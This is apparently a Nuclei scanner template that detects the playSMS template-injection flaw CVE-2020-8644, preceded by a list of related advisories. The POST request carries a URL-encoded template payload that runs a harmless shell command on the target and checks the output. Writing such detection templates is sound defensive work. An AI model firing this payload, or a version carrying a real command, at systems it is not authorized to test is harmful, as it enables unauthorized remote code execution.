| Title | Published | Views | Reporter |
|---|---|---|---|
| PlaySMS Unauthenticated Template Injection Code Execution Exploit | 6 Apr 2020 00:00 | – | zdt |
| CVE-2020-8644 | 5 Feb 2020 00:00 | – | attackerkb |
| The vulnerability of the TPL template implementation in the web interface for SMS gateways and PlaySMS’ SMS messaging services allows a perpetrator to execute arbitrary code. | 1 Dec 2021 00:00 | – | bdu_fstec |
| CVE-2020-8644 | 3 Apr 2020 14:31 | – | circl |
| PlaySMS Server-Side Template Injection Vulnerability | 3 Nov 2021 00:00 | – | cisa_kev |
| Unspecified Vulnerability in PlaySMS | 11 Feb 2020 00:00 | – | cnvd |
| PlaySMS index.php Remote Code Execution (CVE-2020-8644) | 16 Nov 2021 00:00 | – | checkpoint_advisories |
| CVE-2020-8644 | 5 Feb 2020 21:03 | – | cve |
| CVE-2020-8644 | 5 Feb 2020 21:03 | – | cvelist |
| PlaySMS 1.4.3 - Template Injection / Remote Code Execution | 11 Mar 2020 00:00 | – | exploitdb |

```yaml
id: CVE-2020-8644

info:
  name: playSMS <1.4.3 - Remote Code Execution
  author: dbrwsky
  severity: critical
  description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
  reference:
    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8644
    - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
    - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8644
    cwe-id: CWE-94
    epss-score: 0.86689
    epss-percentile: 0.99716
    cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: playsms
    product: playsms
  tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev,vuln

http:
  - raw:
      # Request 1: load the login page so the CSRF token can be extracted.
      - |
        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      # Request 2: submit the login form. The username value URL-decodes to
      # {{`echo 'CVE-2020-8644' | rev`}}, a template expression that only
      # produces the reversed marker if the server evaluates it.
      - |
        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=

    host-redirects: true
    max-redirects: 2

    # Both matchers must hold: the reversed marker in the body and HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '4468-0202-EVC'

      - type: status
        status:
          - 200

    # Pulls the CSRF token from the login form returned by request 1.
    extractors:
      - type: xpath
        name: csrf
        internal: true
        xpath:
          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
        attribute: value
        part: body
# digest: 4b0a00483046022100ab9965901196bf120b293dd1999270655f90c05e1bb94dff4ee67af96f930d1b022100e3a48694cf6412bf94ae9b1854d86a27baf141222402831d38aaa58491d6dd81:922c64590222798bb761d5b6d8e72950
```